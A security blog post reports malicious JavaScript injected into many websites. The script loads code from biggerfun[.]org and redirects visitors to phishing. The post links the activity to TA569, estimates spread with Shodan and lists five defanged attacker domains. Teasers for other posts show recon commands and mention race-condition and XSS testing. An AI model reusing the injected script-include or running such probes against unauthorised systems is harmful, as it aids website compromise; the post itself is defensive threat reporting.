Skip to main content

Mysterious Javascript Code Found Infecting Hundreds of Websites

 



After installing Wappalyzer in my browser, I decided to test its functionality by visiting a familiar website. To my surprise, I was unexpectedly redirected to a spear phishing campaign. Knowing the website's usual practices, it seemed highly unlikely that they would intentionally redirect their visitors in such a manner. Intrigued by this anomaly, I took it upon myself to investigate the underlying cause of this redirection.

 

I have not yet known how threat actors implanted the Javascript Code in the victim's application but this is what it looked like.  

 

 

 

What does the code do?

 

The code is simply importing script from biggerfun[.]org domain. In other words, it's simply doing <script src="biggerfun[.]org"></script>


Further investigation


I wanted to check if others think the website is bad, so I looked into it more. I observed they do things similar to another group called TA569. You can learn more about TA569 here: https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond



How many hosts are infected?


Shodan results


 

Shodan requires some time for updates, and to the best of my knowledge, their scanners operate on IP addresses. Owing to vHosts, a single server can host multiple websites, all accessible from the same IP address, depending on the value of the HTTP Request header HOST. Hence, there should be more victims then the number shown by Shodan.

 

 

Analysis of threat actor's website

Malicious website: biggerfun[.]org

After bruteforcing the paths I found /admin

 

This could be a honeypot or a login page to their C2 dashboard.

 

Exposing more websites used in this campaign to host malicious Javascript code


1. emperorplan[.]org

2. catsndogz[.]org

3. treegreeny[.]org

4. cardladyjob[.]live

5. cjvdfw[.]com



 

 


Comments

Post a Comment

Popular posts from this blog

Getting unlimited money by abusing the 'Send Money' feature

      It has been a while since I published a post. So, I am writing this one to share one of my interesting finding while testing an e-wallet application.     I glanced at my Total Balance and I was wondering if there was a way for me to increase it arbitrarily. So, I thought Race Condition would help me here.  What is a Race Condition vulnerability? "A race condition vulnerability typically occurs when your application has access to the same shared data and attempts to change variables within it simultaneously ." - automox.com So, I loaded up Turbo Intruder in Burp Suite and attempted testing it. I failed. I couldn't exploit it.  I didn't want to give up this soon. I kept that fire bottled up and changed my approach. I realized that the 'Send Money' feature uses basic maths to reduce balance from the sender's account and add it to the receiver's account. So, the feature did the following operations:   function sendMoney(sender, receiver, amoun...
Post a Comment
Read more

How I found Reflected XSS in NCSC UK

Hi, I hope you're well. In this article, I'm writing about how I found Reflected XSS in NCSC UK.  One of my friends messaged me in Facebook saying that he found Insecure Deserialization in NCSC UK. This got me curious and I also wanted to report a vulnerability to them but I wanted to do it quickly without digging too deep. So, I started with my usual recon flow. Reconnaissance At first, I enumerated subdomains using subfinder which returned about 682 subdomains.  $ cat domains.txt | subfinder -silent -recursive > subdomains.txt Then, I probed for HTTP Servers on port 80 and 443 using httprobe $ cat subdomains.txt | httprobe > probedSubdomains.txt I was interested in testing an application with login/registration feature, so, I took screenshot of all the domains to choose a target visually. $ gowitness file -f probedSubdomains.txt After gowitness ended running, I looked at the screenshots and found an interesting target. https://my.ncsc.gov.uk Starting the hunt I registe...
Post a Comment
Read more